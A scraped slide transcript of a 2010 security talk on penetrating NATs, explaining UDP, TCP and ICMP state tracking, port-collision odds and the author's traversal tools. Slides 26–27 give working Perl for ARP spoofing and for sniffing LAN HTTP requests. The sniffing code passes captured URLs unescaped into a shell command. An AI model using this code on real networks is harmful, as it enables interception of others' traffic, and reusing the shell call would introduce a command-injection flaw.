1 / 34

NETWORK CONQUERING: Advanced LAN Manipulation

NETWORK CONQUERING: Advanced LAN Manipulation. Samy Kamkar. July 10, 2010. LILAX. Who is Samy?. Co-Founder of Fonality, IP PBX Company Passionate Developer MySpace XSS Worm author ”Narcissistic Vulnerability Pimp” (aka Security Researcher for fun) Lady Gaga aficionado.

zinnia
Download Presentation

NETWORK CONQUERING: Advanced LAN Manipulation

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. NETWORK CONQUERING: Advanced LAN Manipulation Samy Kamkar July 10, 2010 LILAX

  2. Who is Samy? • Co-Founder of Fonality, IP PBX Company • Passionate Developer • MySpace XSS Worm author • ”Narcissistic Vulnerability Pimp” (aka Security Researcher for fun) • Lady Gaga aficionado

  3. Why am I talking? • Bore you with NATs and how they work • Entertain you with pictures • Teach unknown “features” of NATs • Learn interesting paradoxes of NATs • Check out tools to evade NATs • I like turtles

  4. This is your network.

  5. This is your network on drugs.

  6. A NAT

  7. Things that went out of style by early 2000 IPs

  8. Onto the anatomy… • Goal: penetrating a NAT from another NAT • Typical NAT: when a packet is received, it’s normally only sent off to a client if it’s a packet from a pre-existing connection • Thus, there should be no way to create a connection from one NAT to another if the destination NAT doesn’t allow unknown incoming packets

  9. Our path for a typical packet.

  10. Roadblock: the NAT? Nah… • Educate: what is a NAT? How does it work? • …

  11. Roadblock: the NAT? Nah… • Educate: what is a NAT? How does it work? • NAT RFCs 1631, 2663 • linux-source/net/ipv4/netfilter/nf_nat_*.c • …

  12. Roadblock: the NAT? Nah… • Educate: what is a NAT? How does it work? • NAT RFCs 1631, 2663 • linux-source/net/ipv4/netfilter/nf_nat_*.c • Educate: what packets are normally allowed through? Part of what protocols? • …

  13. Roadblock: the NAT? Nah… • Educate: what is a NAT? How does it work? • NAT RFCs 1631, 2663 • linux-source/net/ipv4/netfilter/nf_nat_*.c • Educate: what packets are normally allowed through? Part of what protocols? • TCP, RFC 793 • RFC 5382 (NAT for TCP) • UDP, RFC 768 • RFC 4787 (NAT for UDP) • ICMP, RFC 792 • RFC 5508 (NAT for ICMP)

  14. Educate: the protocols • We don’t know how to exploit the NAT. • Can we exploit the protocol? • TCP: only allows packets in from existing connections • So what is an “existing connection”? • A packet that matches source/dest IP, source/dest port, and seq/ack number (some of which are rewritten from the NAT)

  15. Educate: the protocols • We don’t know how to exploit the NAT. • Can we exploit the protocol? • UDP: only allows packets in from existing “connections” (despite being connection-less) • So what is an “existing connection”? • A packet that matches source/dest IP, source/dest port • Wait a second…we know the source/dest IP, and we can control the source/dest ports… UDP Header

  16. Our path for a typical packet.

  17. But my NAT munges ports! • Well, damn. • Some NATs randomize source port • 16 bits = 65536 possible ports • I can send ~550 packets in 1 second • So 65536 packets in 120 seconds 

  18. Birthday Paradox: to be 16 again • Birthdays happen more often than you think. n = round( sqrt(-2 * ln(1 - probability_of_match)) * sqrt(total_items) )

  19. Birthday Paradox: continued • If each side sends 545 random source packets regardless of whether NAT munges ports, there’s a 99% chance of collision! • 23 people in a room = 50% chance • 57 people = 99% chance • 366 people = 100% chance

  20. True client-server model • How do we penetrate the NAT like a true client? • Can we exploit the protocol? • TCP: only allows packets in from existing connections • So what is an “existing connection”? • A packet that matches source/dest IP, source/dest port, and seq/ack number (some of which are rewritten from the NAT) • UDP: only allows packets in from existing “connections” (despite being connection-less) • So what is an “existing connection”? • A packet that matches source/dest IP, source/dest port • But we don’t know the source IP…

  21. True client-server model cont. • ICMP: Echo request • Requests never penetrate NATs, will never hit a client • …

  22. True client-server model cont. • ICMP: Echo request • Requests never penetrate NATs, will never hit a client • ICMP: Echo reply • Replies only go through from a request • We know we can’t send a request, never penetrates a NAT • …

  23. True client-server model cont. • ICMP: Echo request • Requests never penetrate NATs, will never hit a client • ICMP: Echo reply • Replies only go through from a request • We know we can’t send a request, never penetrates a NAT • ICMP: Time exceeded (traceroute) • Only goes through in response to an IP packet • Well, all computers can send IP packets • How does a time exceeded packet work? • Content of packet must contain packet originally sent out • We don’t know what the server sends out unless we arbitrarily send out fixed packets that we later “respond to”

  24. A Brief History of Crime

  25. ARP Spoofing ARP Spoofing

  26. ARP Spoofing – Simple! my $raw = new Packet::Inject(device => $device); # inject raw packets! my $eth = new Packet::Ethernet()->encode(); # eth pkt will broadcast my $arp = new Packet::ARP( sender_eth => "a:b:c:d:e:f", # our MAC target_eth => ”ff:ff:ff:ff:ff:ff", # broadcast sender_ip => ”10.0.0.1", # ip we’re stealing target_ip => ”255.255.255.255” # notifying broadcast )->encode(); # now we have a built packet $arp $raw->open(); # open our device for injection $raw->write(packet => $eth . $arp); # inject!!! $raw->close();

  27. Epic Browser Sniffing FTW sub callback { my ($ud, $hdr, $pkt, $s) = @_; $eth->decode($pkt); # decode ethernet packet if ($eth->type == 0x0800) { # 0x0800 == IP packet $ip->decode($eth->data); # decode IP packet if ($ip->proto == 6) { # TCP packet $tcp->decode($ip->data); # decode TCP packet if ($tcp->dest_port == 80) { # HTTP packet # read HTTP header if ($tcp->data =~ /GET (\S+) HTTP.*?Host: (\S+)/s) { # use applescript to open our browser! system qq{osascript -e 'tell application "Safari” to open location “http://$2$1”’}; }}}}}

  28. Q&A A gentleman never asks. A lady never tells.

  29. Fin pwnat: samy.pl/pwnat chownat: samy.pl/chownat Packet: samy.pl/packet Samy Kamkar www.samy.pl samy@samy.pl twitter.com/SamyKamkar

More Related